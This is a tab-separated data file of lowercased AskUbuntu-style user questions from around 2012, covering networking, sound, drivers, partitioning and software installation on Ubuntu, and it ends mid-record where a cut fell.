225315	mysql port forwarding	i am trying to help a colleague to connect to my mysql server . however the situation is a bit special , and here 's why ( let 's call him person a and me , person b ) : person a has a pc , on which he has a virtual machine , which is in the same network as the actual pc he 's running . however person a is also in the same network with person b ( a different network ) . i want the site that lives on a 's vm to be able to connect to the mysql server on b 's pc . for this i 've thought a port forwarding would be appropriate : from ip-of-person-a:3306 to ip-of-person-b:3306 . this way the site would connect to the ip of the pc it 's living on ( not the vm ) , which would forward to a 's mysql . i 've seen several examples of port forwarding , but i do n't think it 's what i need , from what i 've seen , it 's kind of the opposite . so would something like this be achievable ?
225322	how can i close multiple pdfs at the same time	i have lots of pdf opened ( 40-50 ) . i want to close all pdfs at the same time , not one by one .
225333	will ubuntu 12.10 work on lenovo ideapad z585 laptop ?	i would like to install ubuntu 12.10 on my new laptop lenovo ideapad z585 ( a6 4400m 2700 mhz/15.6 '' /1366x768/6144mb/500gb/dvd-rw/wi-fi ) . will the laptop work without problems ? all necessary drivers will be installed ?
225336	error while doing update 12.10 ubuntu	w : failed to fetch http : //deb.opera.com/opera/dists/lenny/non-free/binary-i386/packages 404 not found i have been seeing this error the last few days.. any fixes ? ubuntu 12.10
225337	unable to either locate any wireless networks nor even connect to wifi	i 'm new to linux . i currently have installed ubuntu 12.10 . i had a previous problem with my wireless card ( see url to see previous problem : how to enable wireless in a fujitsu lh532 ? ) . it now shows connect to hidden network and create new wireless network but now unfortunately it simply can not find any wireless connections . i did have a very thorough look around about this problem such as wait a little longer since sometimes it can not load all the wireless connections available that quickly . my wifi is a hidden network and i have used the connect to hidden network feature but it keeps asking for my wep key which has been checked 4 times ( i counted ) and it still seems to not work ; it keeps asking for the wep key . i did try both wep 40/128-bit key and wpa & wpa2 since previously on my windows it worked ; my family later decided to use wep . i only have a quick fix using a usb wireless stick and i wish to have a more solid fix . thanks results from sudo iwlist wlan0 scan wlan0 scan completed : cell 01 - address : 00:1e:73 : c8:62 : bd channel:6 frequency:2.437 ghz ( channel 6 ) quality=25/70 signal level=-85 dbm encryption key : on essid : '' enigmahome '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000cb3bb10a5c extra : last beacon : 696ms ago ie : unknown : 000a456e69676d61486f6d65 ie : unknown : 010482848b96 ie : unknown : 030106 ie : unknown : 0706484b20010b1e ie : unknown : 2a0107 ie : unknown : 32080c1218243048606c ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 cell 02 - address : c8:3a:35:34 : c1:60 channel:6 frequency:2.437 ghz ( channel 6 ) quality=22/70 signal level=-88 dbm encryption key : on essid : '' tenda '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=000001336e70ffdd extra : last beacon : 716ms ago ie : unknown : 000554656e6461 ie : unknown : 010882848b961224486c ie : unknown : 030106 ie : unknown : 32040c183060 ie : unknown : 0706434e20010d10 ie : unknown : 33082001020304050607 ie : unknown : 33082105060708090a0b ie : unknown : dd270050f204104a0001101044000101104700102880288028801880a880c83a3534c160103c000101 ie : unknown : 050400010000 ie : unknown : 2a0106 ie : unknown : 2d1aec0117ffff0000000000000000000000000000000c0000000000 ie : unknown : 3d1606000500000000000000000000000000000000000000 ie : unknown : 7f0101 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk preauthentication supported ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : 0b05010089127a ie : unknown : dd1e00904c33ec0117ffff0000000000000000000000000000000c0000000000 ie : unknown : dd1a00904c3406000500000000000000000000000000000000000000 ie : unknown : dd07000c4304000000 cell 03 - address : 00:1e:73 : c8:62 : bf channel:6 frequency:2.437 ghz ( channel 6 ) quality=47/70 signal level=-63 dbm encryption key : on essid : '' \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000cb3bac614e extra : last beacon : 1064ms ago ie : unknown : 00110000000000000000000000000000000000 ie : unknown : 010482848b96 ie : unknown : 030106 ie : unknown : 050c010200000000000000000000 ie : unknown : 0706484b20010b1e ie : unknown : 2a0107 ie : unknown : 32080c1218243048606c ie : unknown : dd070050f202000100
225342	launch webapps in custom browser	i 'm using google chrome as default web-browser because i need flash ang i 've installed firefox back to use with webapps , because chromium , that i tried to use before , launched through script , taking pepper flash from chrome , is n't working correctly : webapps are crashing , clicking on their icons in launcher or in messaging menu does nothing and by clicking on web-links from the other applications , opens new clean chromium window . i 've tried to fix it , and got only half-result as i 'm telling here , so chromium was purged , google chrome became default browser again and firefox was installed for webapps purposes . and now , when i 'm trying to launch webapp , google chrome starts in new window , with all it 's plugins in memory , and webapp 's icon in messaging menu is inactive : no any updates info , etc , webapp 's icon in launcher does n't appear . if i 'm launching firefox and opening facebook , for example , there is icon in launcher and there is information in messaging menu . i tried to write in .local/share/applications/mimeapps.list and in /usr/share/applications/defaults.list what browser unity-webapps-runner should use but it seems there is no way to do so . i tried to change `` exec '' string .local/share/applications/facebookfacebookcom.desktop to exec=firefox 'http : //facebook.com ' % u and after that by clicking on facebook 's icon in launcher firefox started , but just once . after it 's start , facebookfacebookcom.desktop rewrites with default `` exec '' string and at the next time google chrome 's new window opens . is there any way to tell webapp in what internet-browser it should start ? upd . i tried to copy .desktop file from .local/share/applications/ and to change `` exec '' string there . firefox is launching correctly after that every time and opens second facebook icon in launcher : ) so this desision also is n't acceptible .
225351	why ca n't i browse network shares on 12.04 ?	this is driving me nuts . i recently did a fresh install of 12.04 on three computers ( two laptops , one desktop ) . for a while , i was able to connect to my freenas media server through browse network , but the connection would timeout after a while and the only way to mount the device again was after a reboot . things get more confusing . i wanted to share folders on the computers and was prompted to install samba , which i did on one laptop and the desktop . that enabled me to see the two computers in browse network , but i was n't able to mount the shared folders ( yes , they were definitely shared ) . after some research , i thought installing cifs-utils would help , which i did on the computers with shared folders ; however , after installation i could no longer see the computers through browse network . i removed the application and also removed samba on the desktop . the result : i can see my freenas server but not connect to it at all even after a reboot , but suddenly i am able to mount the shared folder from my laptop , which i did n't except after removing samba . i never had any of these issues with 11.04 , which is what i was using before installing the lts . i could easily navigate shared folders and my freenas , and never had any problems remounting a device any time during a single working session . i know the freenas box is connected to my network , because i use it with wireless media players . so what 's going on ?
225352	oracle java web start silently dies ( ubuntu 12.10 )	default openjdk 7 installed with ubuntu 12.10 works fine . i have a few issues with a proprietary package i 'm using and i need to test against oracle 's java to see if it 's specific to openjdk . however , i can not get oracle 's java web start to work . the normal java command using a jar file works fine . but anything using javaws shows the splash screen and then does nothing . it even returns a 0 status code ( success ) . no output , no errors , nothing . it just silently dies , even with javaws -verbose . i have tried both 6 and 7 installer packages from ppa : webupd8team/java , 32bit and 64bit binary installers of 6 from the sun website . at this point openjdk is completely uninstalled . still nothing . this happens with every jnlp i can get my hands on , including this proprietary package , minecraft , and the oracle jogl test . how can i get useful output out of javaws ? is there a log file somewhere ?
225356	how can i enable the sna acceleration method for intel cards , under ubuntu 12.04 - 12.10 ?	sna acceleration method considered as a `` new '' and better acceleration method compared with default . lot of benchmarks shows us that sna is faster . this acceleration method supported by the 2.20 intel driver . how can i enable and test this method under ubuntu 12.04 - 12.10 ? and how can i revert back if something goes wrong ?
225358	where 's natty ( 11.04 ) package repository ?	it 's meant to be at http : //old-releases.ubuntu.com/ubuntu/dists/ since it 's eol , but i ca n't find it there : $ wget -qo- http : //old-releases.ubuntu.com/ubuntu/dists/ | grep -fie natty -e 11.04 $ nothing relevant found after searching the web for half an hour . it feels like i 'm missing the obvious , but i 've run out of ideas .
225359	wireless active connection not shown in nm drop-down menu	since yesterday i edited my wifi connection at home ( adding a wpa key ) and updated my connection in nm . the connection works and i can surf the web . but the nm menu does n't show any connection , just : *v enable networking v enable wireless connection information edit connections ... * thanks for any help ! ubuntu 12.04 64 bit image here : http : //forum.ubuntu-it.org/download/file.php ? id=4178 & mode=view
225364	running jnlp or any java on live-cd	i want to buy a laptop for basic java programing/learning , and i want to buy a cheep one but not too weak . that 's why i want to benchmark it in some way . by default that laptop comes with dos and i do n't think that anyone will allow me to play with operating systems in the store : ) . that 's why i 'm thinking of ubuntu 's `` try '' option . moreover ubuntu will be an os for laptop 's owner . and i prefer benchmarking tools that work on jvm as its functionality is the main concern . i 've came over a next tool : http : //sourceforge.net/projects/opt/ ? source=dlp i remember that you need to install java manually on the ubuntu , so do i have any chance of the next strategy : go into store insert cd with ubuntu into a laptop run the ubuntu from cd launch java benchmarker ( from external flash drive for example ) receive benchmarks and decide on whether i want to by a laptop
225366	system requirement	my laptop developed a bad sectors and not working well . it was with ubutuntu 12.04 lts operating system . now , i want to install ubuntu in an relatively old desktop with the following specifications hp compaq dx 2390 intel 速 pentium dual core cpu , e2180 @ 2.00 ghz , 1.20 ghz , 1 gb ram , 160 gb hard drive which k/x/ubuntu version is suitable to this desktop ? ps . i am working in my final thesis and i need a stable k/x/ubuntu to this specification . thank u
225373	can i use wubi as an offline installer for 12.10 ?	can i use wubi as an offline installer ? i already had the .iso file of ubuntu 12.10 - i386 , and inside the iso is wubi.exe . for example : i will do a partition of , e:30gb then i will target e : in wubi so that it will be ubuntu then use the .iso file to install it on e : my computer : acer aspire 5750-6683 i5-2450m processor is it fine to do a dual boot ? can i run windows 7 home premium os , with the custom theme and boot screen , can that effect dual booting ? i just do n't want to damage any of files or either any of os and if i ca n't boot any of the operating systems what should i do ? can i avoid doing a clean install if that ever happens ?
225376	what 's the difference between root account and simulated roots ?	so if i disable my root account with sudo passwd -dl root i still have access to sudo { su , bash } or sudo - { s , i } conceptually how are the elavated rights different from the root account ? i know the difference between each of the elevations , or shells , i 'm looking for an in-depth difference between an account and elevated rights ?
225377	how do i write to an outer truecrypt volume when the inner volume protection prevents writng ?	in a nutshell after some time using the outer volume of a hidden volume in truecrypt i can not write to the outer volume anymore . the protection of the inner volume always kicks in before . how do i fix this ? details i 'm using truecrypt 's two layered encryption of a usb stick . the outer container carries my semi-sensitive stuff while the inner hidden values has a bit more valuable information . i use both , the inner and outer volume regularly and that is part of the problem . truecrypt can mount the outer volume for writing while protecting the inner . usually the inner volume , when not protected this way ( or mounted read-only ) would be indistinguishable from free space . that is of course part of the plausible deniability scheme of truecrypt . at the beginning , everything worked as expected . i could copy and delete data to the outer volume as i pleased . now it seams that i have written and deleted enough data to have filled the outer volume once . despite the write protection ubuntu tries now to write to the continuous `` free space '' that is the inner volume . it does that although enough other free space is on the outer volume . but on this free space there used to be data so its fragmented and the file system write prefers continuous space . the write on the continuous free space of the outer volume of course fails ( with the error message in the picture above ) as truecrypt 's inner-volume-protection kicks in . the question i know this is expected behaviour , but is there a better way to write to the outer volume that does not attempt to write to the hidden free space at the end ? the whole question could be more generally rephrased to : how do i control , where on a partition data is written in ubuntu ?
225378	can searchmonkey find a term inside textfiles ?	searchmonkey has a search option called `` containing '' . what can it do ? can it find a term in text file ?
225382	install usblib package - ubuntu	i need the package libusb for another package i am installing . i tried the following which seemed to install the package , sudo apt-get install libusb-dev but when i try to install the other package i get , configure : error : package requirements ( libusb-1.0 > = 0.9.1 ) were not met : no package 'libusb-1.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables libusb_cflags and libusb_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . when i run the command dpkg -l libusb-dev , i get : / . /usr /usr/bin /usr/bin/libusb-config /usr/include /usr/include/usb.h /usr/lib /usr/lib/libusb.a /usr/lib/libusb.la /usr/lib/pkgconfig /usr/lib/pkgconfig/libusb.pc /usr/share /usr/share/doc /usr/share/doc/libusb-dev /usr/share/doc/libusb-dev/html /usr/share/doc/libusb-dev/html/index.html /usr/share/doc/libusb-dev/html/preface.html /usr/share/doc/libusb-dev/html/intro.html /usr/share/doc/libusb-dev/html/intro-overview.html /usr/share/doc/libusb-dev/html/intro-support.html /usr/share/doc/libusb-dev/html/api.html /usr/share/doc/libusb-dev/html/api-device-interfaces.html /usr/share/doc/libusb-dev/html/api-timeouts.html /usr/share/doc/libusb-dev/html/api-types.html /usr/share/doc/libusb-dev/html/api-synchronous.html /usr/share/doc/libusb-dev/html/api-return-values.html /usr/share/doc/libusb-dev/html/functions.html /usr/share/doc/libusb-dev/html/ref.core.html /usr/share/doc/libusb-dev/html/function.usbinit.html /usr/share/doc/libusb-dev/html/function.usbfindbusses.html /usr/share/doc/libusb-dev/html/function.usbfinddevices.html /usr/share/doc/libusb-dev/html/function.usbgetbusses.html /usr/share/doc/libusb-dev/html/ref.deviceops.html /usr/share/doc/libusb-dev/html/function.usbopen.html /usr/share/doc/libusb-dev/html/function.usbclose.html /usr/share/doc/libusb-dev/html/function.usbsetconfiguration.html /usr/share/doc/libusb-dev/html/function.usbsetaltinterface.html /usr/share/doc/libusb-dev/html/function.usbresetep.html /usr/share/doc/libusb-dev/html/function.usbclearhalt.html /usr/share/doc/libusb-dev/html/function.usbreset.html /usr/share/doc/libusb-dev/html/function.usbclaiminterface.html /usr/share/doc/libusb-dev/html/function.usbreleaseinterface.html /usr/share/doc/libusb-dev/html/ref.control.html /usr/share/doc/libusb-dev/html/function.usbcontrolmsg.html /usr/share/doc/libusb-dev/html/function.usbgetstring.html /usr/share/doc/libusb-dev/html/function.usbgetstringsimple.html /usr/share/doc/libusb-dev/html/function.usbgetdescriptor.html /usr/share/doc/libusb-dev/html/function.usbgetdescriptorbyendpoint.html /usr/share/doc/libusb-dev/html/ref.bulk.html /usr/share/doc/libusb-dev/html/function.usbbulkwrite.html /usr/share/doc/libusb-dev/html/function.usbbulkread.html /usr/share/doc/libusb-dev/html/ref.interrupt.html /usr/share/doc/libusb-dev/html/function.usbinterruptwrite.html /usr/share/doc/libusb-dev/html/function.usbinterruptread.html /usr/share/doc/libusb-dev/html/ref.nonportable.html /usr/share/doc/libusb-dev/html/function.usbgetdrivernp.html /usr/share/doc/libusb-dev/html/function.usbdetachkerneldrivernp.html /usr/share/doc/libusb-dev/html/examples.html /usr/share/doc/libusb-dev/html/examples-code.html /usr/share/doc/libusb-dev/html/examples-tests.html /usr/share/doc/libusb-dev/html/examples-other.html /usr/share/doc/libusb-dev/copyright /usr/share/doc-base /usr/share/doc-base/libusb-dev /usr/share/man /usr/share/man/man1 /usr/share/man/man1/libusb-config.1.gz /usr/lib/libusb.so /usr/share/doc/libusb-dev/changelog.debian.gz any ideas ? ?
225393	record sound from mic with headset	i have a headset attached with a microphone . all this on a single cable and when i plugged this into the headset jack , i can hear sound perfectly . i have another port for mic . but i dont want to use it . i need to record sound from the mic on the headset through headset port . i dont think for buying a splitter for the headset/mic combo cable to work . when i checked the sound settings- > input ( tab ) , there is an option `` record sound from '' and it is selected to one and only in-built mic .
225395	what package is glib-sharp-3.0 in ?	this messages comes from banshee 's configure script : configure : error : package requirements ( glib-sharp-3.0 > = 2.99.1 ) were not met : no package 'glib-sharp-3.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . what package should i install ?
225396	how to set free hard-disk size correctly ?	here is 12.10 partition is 2 swap-devs with size of each 16 gibi and one dev with boot and one dev with main-partition for home . i want to dissolve 1 swap-dev for to enlargen the home partition with additional 16 gibi . how do i do this correctly without risk of data-loss ? there is no partition-table ! command fdisk shows no reaction .
225397	how do i copy files onto the hard drive ?	i have never used linux before , but i am temporarily until i can afford win 7 . i want to pre-install some programs onto the hdd so that i will already have them when i get win 7 . i have the programs on an external hd , i just do n't know where to copy them to . just as a side note , i am also having issue connecting to the internet . it recognizes the wired connection , and it is connected to it , but yet , no internet . any help is appreciated .
225400	how to stop updates nagging me in 11.10	i 'm running on 11.10 . my computer keeps on bugging me about 12.04 , but i do n't want it to . please help as it is annoying me and my unity launcher is blocking some of the screen , as the update icon is wobbling . pls help
225409	`` aviaflight mode '' : wifi blocked	i 'm using ubuntu 12.04 lts on lenovo b560 . core linux 3.2.0-34-generic-pae i have set wifi switcher `` on '' and driver broadcom sta `` on '' . window `` network '' -- > `` aviaflight mode '' is n't switched off . i added `` blacklist acer_wmi '' in /etc/modprobe.d/blacklist.conf . wifi does n't work . ( rfkill list : hard blocked : yes ) . how to switch off `` aviaflight mode '' in terminal ?
225414	disk space full	setting up ubuntu 10.04 server , the / disk space shows full under df , however the du does not show any of the space used . this has several mounts to gluster fs ' . i have tried a forced fsck and to no avail . ~ # df -h filesystem size used avail use % mounted on /dev/md0 141g 132g 0 100 % / none 3.0g 224k 3.0g 1 % /dev none 3.0g 0 3.0g 0 % /dev/shm none 3.0g 76k 3.0g 1 % /var/run none 3.0g 0 3.0g 0 % /var/lock none 3.0g 0 3.0g 0 % /lib/init/rw i 've attempted a tune2fs and same issue arises # du -h -- max-depth=1 -- one-file-system / 4.0k /selinux 0 /proc 47m /boot 31m /mnt 8.0k /brick1 8.0k /brick2 391m /lib 4.0k /opt 7.4m /bin 0 /sys 379m /var 5.6m /etc 16k /lost+found 43m /root 4.0k /srv 5.7m /home 4.0k /media 7.0m /sbin 0 /dev 4.0k /tmp 4.0k /cdrom 631m /usr 1.6g / more info # df -ih filesystem inodes iused ifree iuse % mounted on /dev/md0 9.0m 91k 8.9m 1 % / none 746k 770 745k 1 % /dev none 747k 1 747k 1 % /dev/shm none 747k 32 747k 1 % /var/run none 747k 1 747k 1 % /var/lock none 747k 3 747k 1 % /lib/init/rw localhost : /sanvol09 25g 76m 25g 1 % /mnt/sanvol09 the final question : df show 's 100 % used , and its not , any other known fixes ? tune2fs : ~ # tune2fs -l /dev/md0 tune2fs 1.41.11 ( 14-mar-2010 ) filesystem volume name : < none > last mounted on : / filesystem uuid : a94d2b93-35f8-4b59-81f1-38bf48833d0c filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 9371648 block count : 37475824 reserved block count : 3747582 free blocks : 2374280 free inodes : 9304627 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 1015 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 raid stride : 1 flex block group size : 16 filesystem created : tue oct 16 17:41:02 2012 last mount time : tue nov 27 11:51:07 2012 last write time : tue dec 4 08:54:43 2012 mount count : 3 maximum mount count : 34 last checked : tue nov 27 10:08:25 2012 check interval : 15552000 ( 6 months ) next check after : sun may 26 10:08:25 2013 lifetime writes : 24 gb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 first orphan inode : 1048583 default directory hash : half_md4 directory hash seed : 6dc653fe-dd10-46b6-8c7d-a6a292e92ea9 journal backup : inode blocks
225415	ca n't connect to a remote server with nautilus and a private key	the remote server requires a private key and passphrase for authentication . i 'm trying to connect to the server as root ( on that server ) from nautilus running on behalf of my non-root account on my local ubuntu desktop . the private key that is needed for authentication is not located in ~/.ssh ( i 've already got other keys there ) but i have it in another directory . in addition to the obvious approach , i tried putting root @ server in the `` server '' field and leaving `` user name '' and `` password '' fields blank , putting the passphrase in the `` password '' field , but it still says `` permission denied '' and it does n't ask for the private key at any point . i also tried ssh-add path/to/privatekey , but it says `` could not open a connection to your authentication agent . `` , however i 'm not sure if ssh-add is even relevant here . i can ssh into the server from the terminal just fine with ssh -i < ... > /id_rsa root @ server and answering the passphrase question that follows .
225417	how do i preseed multiple partitions on one disk ; /tmp /data /usr swap ?	trying to get preseeding on 12.04 64bit with what should be a basic setup to work : /dev/sda - the only drive beeing used / - rootfs - 100gb /boot - 1gb /tmp - 10gb /data - should take all available space swap - 10gb - d-i partman-auto/expert_recipe string \ boot-root : : \ 1000 50 1000 ext4 \ $ primary { } $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /boot } \ . \ 500 1000 10000 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /tmp } \ . \ 500 5000 100000000 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /data } \ . \ 64 2000 10000 linux-swap \ method { swap } format { } \ . \ 500 3000 100000 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { / } \ . if i only use the code for /boot , swap and / it works . also i was wondering weather i have to specify some other recipe name than `` boot-root '' , but trying `` thisnameisnotdefinedinpartman '' the result was the same . the error message displayed by the ubuntu installer is always `` no root file system is defined ''
225420	network : incoming connections work , outgoing fails	i recently set up my own server at home to run ubuntu 12.04 server ed . on booting up , i noticed that a message related to networking comes up , and the booting process pauses . the message read something like - waiting for network configuration and after a while - waiting another 60 seconds ... on booting up , i realised that any command which requires a network connection was not working - ping , apt-get install , etc . on firing the ifup eth0 command , i get the error rtnetlink answers : file exists . failed to bring up eth0 . i also realised , while searching the web for this problem , that this is probably one of the most common networking related issues - however , most of the questions are around setting up multiple ips for the same machine . ifdown eth0 also fails , stating that eth0 is not configured . my /etc/network/interfaces file has a simple configuration for a static ip : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address xx.xx.xx.xx netmask xx.xx.xx.xx broadcast xx.xx.xx.xx gateway xx.xx.xx.xx dns-nameservers xx.xx.xx.xx the strangest part of this problem is that , while i ca n't connect to anything outside , i can ping to this particular server using the static ip configured in the interface file , and , i can even ssh into it ! i 'm really at ends here with this problem , and any guidance is much appreciated . thanks !
225421	unity dash not launching-11.10	i 'm running 11.10 . i was on my computer today and i wanted to launch unity dash . but i pressed the superkey ( windows key ) and nothing happened . i pressed the ''dash home '' button but still nothing . what am i going to do ? i need dash as it is useful . pls help !
225422	how to make a patched dsdt work in 12.04 ?	my samsung r428 laptop ca n't adjust the backlight with ubuntu 12.04 . under mac os x 10.8.2 , i patched the dsdt file and solved the same problem . i did some search , well , it seems dsdt overriding is no longer suported by ubuntu . how can i fix this problem ?
225425	ubuntu 12.10 - virtualbox not sharing internet with guest system	i went from archlinux to ubuntu on my dev box . i use virtualbox to test web sites on windows and ie . i have my windows 7 virtualbox image running on ubuntu 's virtualbox . back with archlinux , internet worked `` out of the box '' on the windows boxes . i left the default options on the box 's network options ( nat ) . the windows machine shows as `` connected to ethernet '' but reports : the dns server is n't responding so i ca n't access internet from there . i tried searching for ubuntu 's official docs but they seem pretty outdated . i tried using my old boxes from arch ( which boot normally but have no internet ) and creating a new box from ubuntu itself , but still get the same results . update : i 'm using virtualbox 4.1.18 from ubuntu 's repository ( apt-get install virtualbox ) .
225427	ubuntu 12.10 install	hello does anyone know how to install ubuntu from a flash drive ? i think i know how to do it but i do n't want to delete my windows ... i have linux and windows on the same computer you see that 's my problem too i 'm not sure how to do it does anybody know ? edit from response to comments : i want to replace the ubuntu 12.04.1 with the 12.10 version .
225431	ubuntu 12.04 , fan noise , dell inspirion 15 r ( 7520 )	i just installed 12.04 on windows based dell inspirion 15 r ( 7520 ) . the probelm is with the fan . they are running almost all the time . it is annoying and really bothering me . the system is not hot and the temperature for the 4 cores seems to be fine . what can be the problem and how to fix . i really do n't want to go back to windows .
225432	how to install minecraft ( client )	how to correctly install minecraft , including setting any needed packages or apps to install it and to troubleshoot the most common problems that ubuntu users face when trying to user minecraft . i am trying to install and run minecraft without first having to install the oracle version of java . i want to use the openjdk version that comes with ubuntu and as a last resort , use the oracle one . i also want to know a list of problems related to minecraft in ubuntu and the possible solutions to them . a step by step guide on how to install minecraft would also help .
225439	create a gpt on a new volume during installation	i 'd like to install ubuntu precise ( current lts ) on a drive , and i 'd like to discard the current partitioning and instead create a new gpt on that drive . the ubuntu installer allows me to partition the device , and even allows me to create a new partition table , but i find no option to choose what kind of partition table i want , and the fact that subsequent creation of partition offers me a choice between primary and extended suggests that it will always create a mbr partition table . so how can i create a gpt during install ? is there some more advanced install tool ? should i do this from the command line ?
225440	graphics issues nvidia gtx 560 ti	i have a asrock z77 extreme 4 with a nvidia gtx 560 ti video graphics card and i recently bought built it about six months ago . i have installed ubuntu 12.10 64-bit on it ( i installed the 32-bit first ) . over all , the graphics look pretty good , but there are a few issues i wanted to see about fixing : when getting into software center there are major glitches in the icons and the text . i am able to use it , but in a lot of cases i am not able to read the details or reviews of the software information page . it also does something similar every once in a while with other programs , such as file manager , library office , and system settings but not near as often as the software center . it freezes when using super+s . i have done a lot of research and stuff but i can not find the solution . i know it has to do with the graphics drivers and i tried following the directions from this link because it claimed to work with my graphics card but when i rebooted i got a black screen so i just ran the install disk again http : //podzemski.com/2012/10/20/ubuntu-12-10-nvidia-drivers/ . i have tried other methods that changed the aspect ratio and the resolution and made it look really grainy nvidia driver does n't work in 12.10 . my proper aspect ratio and resolution is 1920x1080 ( 16:9 ) i have run all the updates and everything is up to date . there are no additional drivers that it asks for , or anything like that . i am familiar with ubuntu but i am no where near an expert . any help is welcome .
225441	move wubi installation of ubuntu to a different partition in windows failed	i tried to move my wubi installation according to this : move wubi installation of ubuntu to a different partition in windows . but when i boot ubuntu , it ca n't find the root.disk file . is there any way to restore it ? i have ubuntu 12.10 . please help .
225442	record soundcard with arecord ( not microphone )	i 'm trying to records what my soundcard is sending to my speakers ( from the command line ) , so i 've read howto : recording audio from the command line however , when i do : arecord -f cd -t raw | lame -r - testing.mp3 the microphone is recorded , not the sound that 's going to my speakers . how can i specify that i want the 'internal ' and not the microphone sound ?
225444	how to make pulseaudio work again ?	i was having problems with sound ( mono only output ) , so following advice from another askubuntu question i made some edits in /etc/pulse/default.pa after rebooting i had no sound at all . so i deleted /etc/pulse/default.pa entirely and tried another reboot . i did not backup the file ( stupid , i know ) . how to come back to working config ? edit : i tried : sudo apt-get remove pulseaudio ( reboot ) sudo apt-get install pulseaudio ( reboot ) it 's still not working . the file /etc/pulse/default.pa is missing . here 's what pulseaudio and pacmd commands show : $ pulseaudio e : [ pulseaudio ] main.c : daemon startup without any loaded modules , refusing to work . $ pacmd no pulseaudio daemon running , or not running as session daemon .
225445	smplayer not playing any sound	i am trying to play various formats on smplayer but none of them have sound , mp4 , mp3 , flash videos after download from youtube , wav . these are all playing with gnome mplayer , but i require the smtube tool to watch youtube videos directly on smplayer . sound is enabled . here it is a screenshot .
225453	why the longman dictonary does n't work with ubuntu 12.04 ?	i installed the longman dictionary of contemporary english 5 on ubuntu 12.04 ( 64bit ) , it 's completely installed ; but when i want to run it , nothing happens . also in terminal generates this error : ./ldoce5-bin : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory and after try : sudo apt-get install libgtk1.2 generates this error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libgtk1.2 e : could n't find any package by regex 'libgtk1.2' why ?
225455	how do i capture the output of a command and put it in a label ?	this is an extract from the code of a quickly application i 'm working on : # code for other initialization actions should be added here . self.apachestart = self.builder.get_object ( `` apachestart '' ) self.label1 = self.builder.get_object ( `` label1 '' ) def on_apachestart_clicked ( self , widget ) : subprocess.call ( [ 'sudo ' , 'service ' , 'apache2 ' , 'start ' ] ) now when i press the button to start apache ( named apachestart ) , it prints to standard out in the terminal that the server was started : * starting web server apache2 [ ok ] how do i get that text output from the terminal to be shown in a label ?
225460	fix headphone jack so that the output is stereo , not part of surround sound	i have an issue when listening to music through my headphones - sound appears to get lost , as if i had surround sound output and plugged in a stereo device . moving the balance all the way to the left or right helps some , but the output is n't quite properly balanced . what can i try to fix/troubleshoot this issue ? i have n't been able to find much on the web about this particular topic .
225462	where/how can i find somebody to help me packaging an application for ubuntu in my area ?	i would like to learn how to package an application to a ppa which available in source code and gpl licensed . i would like to learn how to do it myself . is there a way to find ubunteros in my area to meet ( san francisco - san jose ) ?
225466	second nic on dual homed server not working	i 'm trying to set up a server with two ip addresses on different connections . the first nic works fine ( since i removed the gateway from the second ) , but i ca n't ping out or to the second nic . anybody know what the next step is to get this thing working ? /etc/network/interfaces # the primary network interface auto eth0 iface eth0 inet static address x.30.254.201 netmask 255.255.255.224 gateway x.30.254.195 auto eth1 iface eth1 inet static address x.167.210.200 netmask 255.255.255.240 route -n kernel ip routing table destination gateway genmask flags metric ref use iface x.167.210.192 0.0.0.0 255.255.255.240 u 0 0 0 eth1 x.30.254.192 0.0.0.0 255.255.255.224 u 0 0 0 eth0 0.0.0.0 x.30.254.195 0.0.0.0 ug 100 0 0 eth0 ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:3d : da : a8 inet addr : x.30.254.201 bcast : x.30.254.223 mask:255.255.255.224 inet6 addr : x : :20c:29ff : fe3d : daa8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:168959 errors:2 dropped:0 overruns:0 frame:0 tx packets:146167 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:139568273 ( 139.5 mb ) tx bytes:102699057 ( 102.6 mb ) interrupt:18 base address:0x2000 eth1 link encap : ethernet hwaddr 00:0c:29:3d : da : b2 inet addr : x.167.210.200 bcast : x.167.210.207 mask:255.255.255.240 inet6 addr : x : :20c:29ff : fe3d : dab2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1688 errors:0 dropped:0 overruns:0 frame:0 tx packets:70 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 